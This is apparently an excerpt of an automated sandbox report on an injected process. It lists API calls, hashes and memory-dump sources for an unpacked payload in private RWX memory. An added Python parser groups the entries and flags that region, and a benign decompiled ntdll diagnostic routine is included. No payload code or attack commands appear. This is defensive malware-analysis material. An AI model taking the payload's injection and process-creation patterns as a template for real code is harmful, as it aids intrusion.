• Instruction ID: d66096279c1c743650d7e534d218f69748bb0c00b6b0b0fa9fc1070bd00e2eef
• Opcode Fuzzy Hash: a34d237501d9e6eb15f179212a829eefccdc60bf9004e0cb764b09a57fe5b91d
• Instruction Fuzzy Hash: D39002B120200007460571594514617400B97E4241B51C021F10045B0DC5658CD1B175
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
• Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp
• Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b3f57f520c24e4f9fa2ff2e16f41d1bb27413ab73659d4e771894ddbc8b664f2
• Instruction ID: 70efe9322a0e555bc74fe9970a6d6d2ac6ef1a68e8854e4c99e5f454eae890ab
• Opcode Fuzzy Hash: b3f57f520c24e4f9fa2ff2e16f41d1bb27413ab73659d4e771894ddbc8b664f2
• Instruction Fuzzy Hash: 609002B134100446D60071594514B070006D7E5341F51C015F1054574D8659CC92B176
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
• Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp
• Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 8e7f248f72b18338d0e5bca999fd1fba73bf7a3b5b1e83db5d47e78f9786baab
• Instruction ID: f32bb3c350429112f690cc6555f54ab2c79c8def63ef71055e77ae3dacfe8076
• Opcode Fuzzy Hash: 8e7f248f72b18338d0e5bca999fd1fba73bf7a3b5b1e83db5d47e78f9786baab
• Instruction Fuzzy Hash: E2900275211000070605B5590704507004797D9391351C021F1005570CD6618CA1A171
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
• Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp
• Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: a54b085232909e91d546850e766486ad491b5aa189c0bc5a7d999a24f0a7c51e
• Instruction ID: 88eac167a85e80f6d5461198e440fadc91e7f7a678a6eb1394574bdf79a4274e
• Opcode Fuzzy Hash: a54b085232909e91d546850e766486ad491b5aa189c0bc5a7d999a24f0a7c51e
• Instruction Fuzzy Hash: 5B9002B120100406D64071594504747000697D4341F51C011B5054574E86998DD5B6B5
Uniqueness
Uniqueness Score: -1.00%

APIs
• Sleep.KERNELBASE(000007D0), ref: 003D7378
Strings
Memory Dump Source
• Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
• Opcode ID: ecf50558a9060ec4e1df6064c2ff240d5e539f6590f5175ecf64a77f36588282
• Instruction ID: 45f6d938b184bb220c41253de6bb90ed6fbaa4863319b6bacda90d0a4a05dce6
• Opcode Fuzzy Hash: ecf50558a9060ec4e1df6064c2ff240d5e539f6590f5175ecf64a77f36588282
• Instruction Fuzzy Hash: C83181B6505604ABC716DF68D8A1FABB7B8FF48700F04811EFA199B341D770A955CBE0
Uniqueness
Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • Sleep.KERNELBASE(000007D0), ref: 003D7378
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID: net.dll$wininet.dll
                                                                      • API String ID: 3472027048-1269752229
                                                                      • Opcode ID: 85a205f1776b4d367c130f75dbe972d85131c5f4ca7c1d559701bf913afeaf32
                                                                      • Instruction ID: 26e3edb5204f002bc89388e67a1e9bcd0488bf09a7adbb22885e64d7fdb0993a
                                                                      • Opcode Fuzzy Hash: 85a205f1776b4d367c130f75dbe972d85131c5f4ca7c1d559701bf913afeaf32
                                                                      • Instruction Fuzzy Hash: 4E21A2B6605600ABD716DF68D8A1F9BB7B8FF48700F14812EF9199B342D770A855CBE0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,003C3B93), ref: 003D88ED
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID: .z`
                                                                      • API String ID: 3298025750-1441809116
                                                                      • Opcode ID: fb577c580f140c774de91f11b8bc0a00e42ac97be9b1401ed09f88cfedee0994
                                                                      • Instruction ID: 4382370002bc9b8cf54de05fce3c985b290de52aea76290deceb48d5f7781e26
                                                                      • Opcode Fuzzy Hash: fb577c580f140c774de91f11b8bc0a00e42ac97be9b1401ed09f88cfedee0994
                                                                      • Instruction Fuzzy Hash: 90F062762002146FC716DFA8EC49EE777A9EF89324F008556F94C9B312D530E915CAF0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(&5=,?,003D3C9F,003D3C9F,?,003D3526,?,?,?,?,?,00000000,00000000,?), ref: 003D88AD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID: &5=
                                                                      • API String ID: 1279760036-970485223
                                                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                      • Instruction ID: 7afc3cf4c31115b7e3ad64cb54e08c0095488ae4eb8c1443ef6471244117954b
                                                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                      • Instruction Fuzzy Hash: A3E012B2200208ABDB14EF99DC45EA777ADAF88654F118559BA085B342CA30F910CAF0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,003C3B93), ref: 003D88ED
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID: .z`
                                                                      • API String ID: 3298025750-1441809116
                                                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                      • Instruction ID: 85352a21715a9acbb7e90f1c5f73196b056eec7c097b452b007bac3f4cbeefbf
                                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                      • Instruction Fuzzy Hash: 76E04FB12002056BD714DF59DC49EA777ADEF88750F014555FE085B341C630F910CAF0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 003C72DA
                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 003C72FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      • Opcode ID: 88186e1a6a040d2bf16c93278c7dfa049f009a70260cbae7ddabd39e281de416
                                                                      • Instruction ID: 4862464d8fbb89bc5dc5271796b857411a123358c5105f864c6cb86edb3785b0
                                                                      • Opcode Fuzzy Hash: 88186e1a6a040d2bf16c93278c7dfa049f009a70260cbae7ddabd39e281de416
                                                                      • Instruction Fuzzy Hash: DF018F32A8022976E722A6949C03FBE776C5B00B50F150519FF04FE2C2EAA46E0647E6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,003C7C83,?), ref: 003CD44B
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 80dfb07871fb7cdd93fced538cf74e17c5b88782aa7f81d92c2eacaf6f6ebd17
                                                                      • Instruction ID: 194b17815e4e70b0783dc1bb4ca45d81dbee9da8ac020ded2ba3c0e87d8e96df
                                                                      • Opcode Fuzzy Hash: 80dfb07871fb7cdd93fced538cf74e17c5b88782aa7f81d92c2eacaf6f6ebd17
                                                                      • Instruction Fuzzy Hash: 4931F872A501187EEB16EB90EC46FBA736CDB54714F0541AEFD08DB242EB709E4487A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 003C9BA2
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                                      • Instruction ID: 73de467a03139d0bc66342c0a8e5ea8001780d9f75f9db1119b3508692cc5a75
                                                                      • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                                      • Instruction Fuzzy Hash: 5E011EB6D0020DBBDF11EBA4EC86F9DB7B89B54308F00419AA9089B241F671EB14CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 003D8984
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInternalProcess
                                                                      • String ID:
                                                                      • API String ID: 2186235152-0
                                                                      • Opcode ID: 9837cecb357a722f42e6f40b62fe3e27b665772340ac94f8699bbd2f174e1823
                                                                      • Instruction ID: 0c1c150a3282b3e2acf4ccfbbeffbe38511f7b0aa03cf14b5b369247f22736dc
                                                                      • Opcode Fuzzy Hash: 9837cecb357a722f42e6f40b62fe3e27b665772340ac94f8699bbd2f174e1823
                                                                      • Instruction Fuzzy Hash: AA01F2B2200109BFCB04DF88DC84EEB37ADAF8C354F158208FA0DA7240DA30E841CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 003D8984
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInternalProcess
                                                                      • String ID:
                                                                      • API String ID: 2186235152-0
                                                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                      • Instruction ID: 1abb0db7ec108e0f434b13e43b17b434d748abc899fcef3b8e13c058aa0ab630
                                                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                      • Instruction Fuzzy Hash: 3101B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,003CCCE0,?,?), ref: 003D743C
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      • Opcode ID: e8f7359f4bedd460e93fcc7b610fa5d401544a37555f2b0317736e19f5f75f0c
                                                                      • Instruction ID: 208f7d21ad8dd9c691f49d574f942346d754b386c21c2ab26d5ab72829ead12a
                                                                      • Opcode Fuzzy Hash: e8f7359f4bedd460e93fcc7b610fa5d401544a37555f2b0317736e19f5f75f0c
                                                                      • Instruction Fuzzy Hash: 64E092733803043AE33265A9BC03FA7B39CCB81B25F550026FB0DEB2C1D595F80142A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,003CCFB2,003CCFB2,?,00000000,?,?), ref: 003D8A50
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: 461ad38a56e1be1be9b57a1a35410789d1f4814218c2486d615b739fa0d42dad
                                                                      • Instruction ID: b2f04313a6b70d7ae952063553e22fa4b2cf1871162261300a15e3567f66cfdd
                                                                      • Opcode Fuzzy Hash: 461ad38a56e1be1be9b57a1a35410789d1f4814218c2486d615b739fa0d42dad
                                                                      • Instruction Fuzzy Hash: BCF08CB2600204AFDB21DF94EC44EE737A9EF88360F05845AF90C9B300D931E8108BB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,003CCCE0,?,?), ref: 003D743C
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      • Opcode ID: 4f125925b0435a4dbbc4884746fe48f7711e42df2b6253a6bdaf93769d99ac95
                                                                      • Instruction ID: 27335626b109ded25f886cf1865511d6159897f4741362a7b3874d9829f7f036
                                                                      • Opcode Fuzzy Hash: 4f125925b0435a4dbbc4884746fe48f7711e42df2b6253a6bdaf93769d99ac95
                                                                      • Instruction Fuzzy Hash: 4AF0EC732442003AD3325668DC43FE7F768DF91B10F154129F64AAF2C1D691F9018665
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,003CCFB2,003CCFB2,?,00000000,?,?), ref: 003D8A50
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                      • Instruction ID: 74c5a5287b1b5e4cb6112afa4bf9c36233b2df968bcfb95c94ea8d66dd17ed48
                                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                      • Instruction Fuzzy Hash: 06E01AB12002086BDB10DF49DC85EE737ADAF89650F018155BA085B341C930E8108BF5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,003C7C83,?), ref: 003CD44B
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                                                      • Instruction ID: 073ccbc8ca75c421e7eb92b4e3f0c87cb499ab5d08325dde6363babc0bfdf32c
                                                                      • Opcode Fuzzy Hash: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                                                      • Instruction Fuzzy Hash: AAD05E627503042AE610BAA49C03F2672885B44B00F494074FA48DA3C3D964E9004162
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
                                                                      • Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp
                                                                      • Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 3e72b9b0507866a0a8a9254bcc01a6a88de6d8256206013652c6bc0c47686314
                                                                      • Instruction ID: 5a569479e58eabbfaa0bf04e262662896d67b1ea9ce420c4986dbeb03de92202
                                                                      • Opcode Fuzzy Hash: 3e72b9b0507866a0a8a9254bcc01a6a88de6d8256206013652c6bc0c47686314
                                                                      • Instruction Fuzzy Hash: 2FB092B29024C5CAEB11F7A14B08B3B7A01BBD4741F26C062E24206B1A4778C8D1F6B6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

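The per-function entries above are flat report text: one "APIs" bullet per resolved call with its call-site address, a "Source File" line naming the memory dump the function was lifted from, and the Similarity identifiers. The following Python is an added example, not part of the Joe Sandbox report or its tooling. It parses a constructed, abridged copy of four of the entries above, groups what it finds by region offset, and flags the region that is private RWX memory with no PE backing (the 003C0000 dump, where the unpacked payload's Sleep/CreateProcessInternalW/LdrLoadDll calls live) as distinct from the PE-backed 02D20000 mapping. The meaning it assigns to the fifth and sixth dotted fields of the dump file name (memory protection and memory type) is an assumption about the report's naming; the constants PAGE_EXECUTE_READWRITE = 0x40 and MEM_PRIVATE = 0x20000 are the documented Win32 values.

```python
"""Added example (not part of the report): summarise Joe Sandbox 'Similarity' entries by region."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

PAGE_EXECUTE_READWRITE = 0x40  # documented Win32 protection constant
MEM_PRIVATE = 0x20000          # documented Win32 memory-type constant
# Constructed sample: four entries abridged from the listing above.
SAMPLE = """\
APIs
• Sleep.KERNELBASE(000007D0), ref: 003D7378
Memory Dump Source
• Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• Opcode ID: ecf50558a9060ec4e1df6064c2ff240d5e539f6590f5175ecf64a77f36588282
APIs
• Sleep.KERNELBASE(000007D0), ref: 003D7378
Memory Dump Source
• Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• Opcode ID: 85a205f1776b4d367c130f75dbe972d85131c5f4ca7c1d559701bf913afeaf32
APIs
• CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 003D8984
Memory Dump Source
• Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
Similarity
• API ID: CreateInternalProcess
• String ID:
• Opcode ID: 9837cecb357a722f42e6f40b62fe3e27b665772340ac94f8699bbd2f174e1823
APIs
Memory Dump Source
• Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
Similarity
• API ID: InitializeThunk
• String ID:
• Opcode ID: 3e72b9b0507866a0a8a9254bcc01a6a88de6d8256206013652c6bc0c47686314
"""

# "Symbol.MODULE(args), ref: ADDR"; the "Strings" bullets end in "xrefs:" and so do not match.
API_RE = re.compile(r"^• (?P<sym>.+?)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$")
SRC_RE = re.compile(r"^• Source File: (?P<dump>\S+), Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")
KV_RE = re.compile(r"^• (?P<key>API ID|String ID|Opcode ID): ?(?P<val>.*)$")


@dataclass
class Entry:
    dump: str = ""
    offset: str = ""
    pe_backed: bool = False
    calls: list = field(default_factory=list)  # (module, symbol, call-site address)
    api_id: str = ""
    string_id: str = ""
    opcode_id: str = ""


def parse_entries(text: str) -> list[Entry]:
    """Each entry starts at an 'APIs' header; bullets are recognised by their shape."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            entries.append(cur := Entry())
        elif cur is None:
            continue
        elif m := API_RE.match(line):
            cur.calls.append((m["mod"], m["sym"], m["ref"].upper()))
        elif m := SRC_RE.match(line):
            cur.dump, cur.offset, cur.pe_backed = m["dump"], m["off"].upper(), m["pe"] == "true"
        elif m := KV_RE.match(line):
            setattr(cur, m["key"].lower().replace(" ", "_"), m["val"].strip())
    return entries


def region_flags(dump: str) -> tuple[int, int]:
    """Assumed dump-name layout <proc>.<stage>.<id>.<base>.<protect>.<type>.sdmp."""
    parts = dump.split(".")
    return int(parts[4], 16), int(parts[5], 16)


def summarise(entries: list[Entry]) -> dict[str, dict]:
    """Per region: APIs called, strings seen, and call sites claimed by several functions."""
    regions: dict[str, dict] = {}
    for e in entries:
        r = regions.setdefault(e.offset, {"pe_backed": e.pe_backed, "functions": 0, "apis": set(),
                                          "strings": set(), "by_site": defaultdict(set)})
        r["functions"] += 1
        for mod, sym, ref in e.calls:
            r["apis"].add(f"{mod}!{sym}")
            r["by_site"][ref].add(e.opcode_id)
        r["strings"].update(s for s in e.string_id.split("$") if s)
        protect, mem_type = region_flags(e.dump)
        # Private RWX memory with no PE backing is where an unpacked/injected payload lives.
        r["suspicious"] = not e.pe_backed and protect == PAGE_EXECUTE_READWRITE and mem_type == MEM_PRIVATE
    for r in regions.values():
        r["shared_sites"] = {ref: sorted(ids) for ref, ids in r["by_site"].items() if len(ids) > 1}
    return regions
```

Feed it the whole listing and the per-region API set is the quickest inventory of what the injected code does without reading every entry. The shared-site check matters for that count: two entries with different Opcode IDs but the same ref address (Sleep at 003D7378 above) are most likely overlapping decompilations of one call, not two code paths, so per-region API counts should be taken over unique ref addresses rather than over entries.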
                                                                      Non-executed Functions

                                                                      C-Code - Quality: 53%
                                                                      /* Non-executed ntdll helper in the PE-backed 02D20000 mapping: it prints the RTL
                                                                         critical-section timeout diagnostics. Each statement carries its instruction
                                                                         address (the report's address column, merged here) and, as analyst interpretation
                                                                         rather than report output, the public TEB / RTL_CRITICAL_SECTION field behind
                                                                         each raw offset. */
                                                                      			E02DDFDDA(intOrPtr* __edx, intOrPtr _a4) {  /* __edx -> 64-bit timeout; ecx (_t12) -> RTL_CRITICAL_SECTION */
                                                                      				void* _t7;
                                                                      				intOrPtr _t9;
                                                                      				intOrPtr _t10;
                                                                      				intOrPtr* _t12;
                                                                      				intOrPtr* _t13;
                                                                      				intOrPtr _t14;
                                                                      				intOrPtr* _t15;
                                                                      
                                                                      				_t13 = __edx;  /* 02ddfdda */
                                                                      				_push(_a4);  /* 02ddfde2 */
                                                                      				_t14 =  *[fs:0x18];  /* 02ddfde5  TEB (NtTib.Self) */
                                                                      				_t15 = _t12;  /* 02ddfdec  the critical section */
                                                                      				_t7 = E02D8CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);  /* 02ddfdfa  64-bit divide: timeout (100 ns units) / -10,000,000 = seconds */
                                                                      				_push(_t13);  /* 02ddfdff */
                                                                      				E02DD5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);  /* 02ddfe0a  DbgPrintEx-style: 0x65 = DPFLTR_DEFAULT_ID, 1 = warning level */
                                                                      				_t9 =  *_t15;  /* 02ddfe0f  DebugInfo */
                                                                      				if(_t9 == 0xffffffff) {  /* 02ddfe17  no RTL_CRITICAL_SECTION_DEBUG attached */
                                                                      					_t10 = 0;  /* 02ddfe1e */
                                                                      				} else {  /* 02ddfe19 */
                                                                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));  /* 02ddfe19  DebugInfo->ContentionCount */
                                                                      				}  /* 02ddfe19 */
                                                                      				_push(_t10);  /* 02ddfe20 */
                                                                      				_push(_t15);  /* 02ddfe21 */
                                                                      				_push( *((intOrPtr*)(_t15 + 0xc)));  /* 02ddfe22  OwningThread */
                                                                      				_push( *((intOrPtr*)(_t14 + 0x24)));  /* 02ddfe25  TEB->ClientId.UniqueThread */
                                                                      				return E02DD5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));  /* 02ddfe40  TEB->ClientId.UniqueProcess; 0 = error level */
                                                                      			}

                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02DDFDFA
                                                                      Strings
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02DDFE2B
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02DDFE01
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
                                                                      • Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp
                                                                      • Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                      • API String ID: 885266447-3903918235
                                                                      • Opcode ID: cb7e3cccaedbdeb1bb52ccfc6add512762696aec928d9f649aba4086b3f8605c
                                                                      • Instruction ID: c44cbf23067bccb81202deb4ff0ba45292cdb755d59bac9206ea9bc5bd22202a
                                                                      • Opcode Fuzzy Hash: cb7e3cccaedbdeb1bb52ccfc6add512762696aec928d9f649aba4086b3f8605c
                                                                      • Instruction Fuzzy Hash: D5F0F632600601BFE6251B55EC06F23BB6BEB44730F244315F628566D1DA62FC20C6F0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%